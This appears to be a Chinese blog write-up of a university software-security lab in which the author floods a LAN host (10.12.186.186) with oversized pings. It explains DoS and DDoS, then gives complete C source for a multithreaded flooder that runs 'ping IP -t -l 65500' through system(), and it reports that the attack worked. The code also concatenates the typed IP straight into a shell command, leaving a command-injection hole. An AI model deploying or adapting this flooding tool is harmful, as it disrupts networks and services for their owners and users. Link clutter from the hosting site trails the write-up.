文章目录

  • 实验任务
  • 实验过程
    • DoS攻击与DDoS攻击
    • ping命令参数
    • 实施DDoS攻击

实验任务

对局域网内IP地址为10.12.186.186的主机(已关闭防火墙)发起基于网络流量DDoS攻击。

实验过程

DoS攻击与DDoS攻击

DoS是Denial of Service的简称,即拒绝服务。造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DOS攻击有计算机网络宽带攻击和连通性攻击。DoS攻击的目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃
    分布式拒绝服务攻击(DDoS)可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用。DDoS攻击的思路是与目标主机建立大量的网络连接,发送大量的网络请求,大量占用其网络资源,使其网络无法提供正常的服务。

ping命令参数

在Windows下使用命令ping /?查看ping命令参数的含义:
    通过该提示可以看出:我们可以使用ping命令的-n参数指定要发送的回显次数(或者使用-t参数使其一直发送),可以使用-l指定发送的缓冲区大小,可以使用-w指定等待每次回复的时间。

实施DDoS攻击

DoS攻击程序需要与目标主机建立大量的网络连接,发送大量的网络请求,大量占用其网络资源,使目标主机网络无法提供正常的服务。
    而ping命令可以使用ping命令的- t参数使其一直对目标主机发送网络请求,可以使用-l 65500指定较大的发送缓冲区大小
    程序需要控制输入一个有效的IP地址,然后利用字符串拼接操作拼接出“ping +IP地址”的命令,通过调用system函数使用ping命令实现攻击
    为了使得单机的攻击最大化,需要使用线程编程技术中的CreateThread函数创建多个线程进行攻击。此外,还需要多开攻击进程(使攻击进程占所有进程的比例增加,使得攻击进程尽量占用更多的时间片),使其尽量消耗CPU资源,使攻击效果最大化。
    DDoS攻击程序源代码如下:

#include <stdio.h>
#include <windows.h>#define MaxSize 50
#define MaxThreadNum 128HANDLE ThreadHandle[MaxThreadNum]; //线程句柄
DWORD ThreadID[MaxThreadNum];      //线程IDDWORD WINAPI DDosServer(LPVOID IP_Address)
{//初始化ping命令char Command[MaxSize] = "ping \0";//IP格式转化char *IP = (char *)IP_Address;//拼接IPstrcat(Command, IP);//拼接ping命令参数(方式、缓冲区大小、请求数)//同时保证可控strcat(Command, " -t -l 65500\0");//执行ping命令//这个命令不会结束,程序无法正常终止system(Command);return 0;
}int main()
{int ThreadNum = 8;char IP[16] = {0};//输入目标主机IPprintf("请输入目标主机IP: ");scanf("%s", IP);printf("请输入攻击线程数:");scanf("%d", &ThreadNum);for (int i = 0; i < ThreadNum; ++i){ThreadHandle[i] = CreateThread(NULL, 0, DDosServer, &IP, 0, &ThreadID[i]);if (ThreadHandle != NULL)printf("攻击线程%d创建成功!\n", i);elseprintf("攻击线程%d创建失败!\n", i);}//等待全部线程结束WaitForMultipleObjects(ThreadNum, ThreadHandle, TRUE, INFINITE);for (int i = 0; i < ThreadNum; ++i){//关闭线程句柄//TerminateThread(ThreadHandle[i], 0);if (CloseHandle(ThreadHandle[i]) == true)printf("攻击线程%d结束成功!\n", i);}return 0;
}

启动攻击程序,输入IP地址10.12.186.186,开始DDoS攻击。
    在刚刚发动DDOS攻击时,攻击方能正常收到目标机器的回复报文

    在多台机器上使用多个进程和多个线程进行DDoS攻击时,观察到部分回复报文丢失

    此时,在目标主机上观察到:DDoS攻击虽然未能使目标主机瘫痪,但是大量占用了目标主机的网络资源,可能使其网络无法提供正常的服务,DDoS攻击成功有效。

软件安全实验——局域网DDoS攻击相关推荐

  1. 无线局域网DDoS攻击概述

    随着计算机网络技术的发展,无线局域网成为高速发展的无线通信技术在计算机网络中实现通信移动性.个性化和多媒体应用等.但是,由于无线通信的传播介质是毫无实体保护的空气,无线 发送的数据就有可能到达覆盖范围 ...

  2. 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)

    1.什么是DOS/DDOS攻击? DOS:拒绝服务攻击(Deny Of Service) DDOS:DDOS攻击(Distributed denial of service attack) 一般来说D ...

  3. 大数据DDos检测——DDos攻击本质上是时间序列数据,t+1时刻的数据特点和t时刻强相关,因此用HMM或者CRF来做检测是必然! 和一个句子的分词算法CRF没有区别!...

    DDos攻击本质上是时间序列数据,t+1时刻的数据特点和t时刻强相关,因此用HMM或者CRF来做检测是必然!--和一个句子的分词算法CRF没有区别! 注:传统DDos检测直接基于IP数据发送流量来识别 ...

  4. DDOS攻击(流量攻击)防御步骤

    DDOS全名是Distributed Denial of service (分布式拒绝服务攻击),很多DOS攻击源一起攻击某台服务器就组成了DDOS攻击,DDOS 最早可追溯到1996年最初,在中国2 ...

  5. 【网络安全】免费DDOS攻击测试工具

    DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停 ...

  6. 反射型 DDoS 攻击的原理和防范措施

    随着僵尸网络的兴起,同时由于攻击方法简单.影响较大.难以追查等特点,分布式拒绝服务攻击(DDoS,Distributed Denial of Service)得到快速壮大和日益泛滥. 成千上万主机组成 ...

  7. 虚拟专题:知识图谱 | DDoS攻击恶意行为知识库构建

    来源:电信科学 DDoS攻击恶意行为知识库构建 刘飞扬, 李坤, 宋飞, 周华春 北京交通大学电子信息工程学院 摘要:针对分布式拒绝服务(distributed denial of service,D ...

  8. ddos攻击工具_linux下DDoS攻击模拟实战

    前言:电影院如期开放,据前线消息,人实在是少,有些场次一个人看一场,在华夏有电影院开始,应该都少有这种场景吧,再次希望疫情早日散去,在此引用一句话来配合一次图:"直到乌云散去风雨落幕,我们一 ...

  9. 征集大家的网站如何防范DDOS攻击解决方案

    近段时间,网站一直饱受DDOS困扰,因为网站上的某些内容得罪了某些骗子,再经过与编辑的几次交涉后仍然没有说删除文章,就受到了严重的DDOS攻击,那段时间网站的几近瘫痪,远程桌面连上鼠标都挪不动,服务器 ...

最新文章

  1. dwa的区别 teb_teb_local_planner安装及使用
  2. C++知识点38——拷贝赋值运算符、析构函数、=default、阻止拷贝和赋值
  3. 【数字信号处理】线性时不变系统 LTI “ 输入 “ 与 “ 输出 “ 之间的关系 ( 周期性分析 | 卷积运算规律 | 交换律 | 结合律 | 分配率 | 冲击不变性 )
  4. 每天一道LeetCode-----n皇后问题
  5. 如何有效申请TI的免费样片
  6. 十万服务器秒级管控 腾讯云如何将AIOps用于日常管理?
  7. 工作项跟踪管理系统需求
  8. openeim出去会有坏人把自己抓跑
  9. 处理大并发之五 使用libevent利器bufferevent
  10. 统计数字(信息学奥赛一本通-T1239)
  11. TWebBrowser的常见属性和方法
  12. 07树莓派下的浏览器
  13. 20155235 信息安全技术概论 第二次实验报告
  14. 推荐背单词最有效的方法:使用艾宾浩斯记忆曲线背单词
  15. php课后答案 唐四薪_PHP课后小结 12.20
  16. 如果不知道前路在哪儿,那就走好眼前路
  17. 2006年在职攻读硕士学位全国联考A
  18. 【测试理论基础】史上最强边界值用例设计与实践经验分享
  19. Java LocalDate类| 带示例的getMonth()方法
  20. 大数据时代的“拼图者”

热门文章

  1. 整洁架构读书笔记(Clean Architecture)
  2. 找工作再也不愁之面试技巧全覆盖-这样面试保证拿Offer
  3. annotations are not allowed here
  4. 互联网人,你有一副春联待查收
  5. 基于Springboot 的实验室检测信息管理系统
  6. 计算机学院实验员岗位基本知识,实验室人员职责
  7. 还在直接用 JWT 做鉴权?JJWT 真香
  8. 做销售,如何开发陌生市场?
  9. 披着人皮的幽灵们……(读《死亡清扫日记》有感)
  10. 计算方法(二):n次多项式插值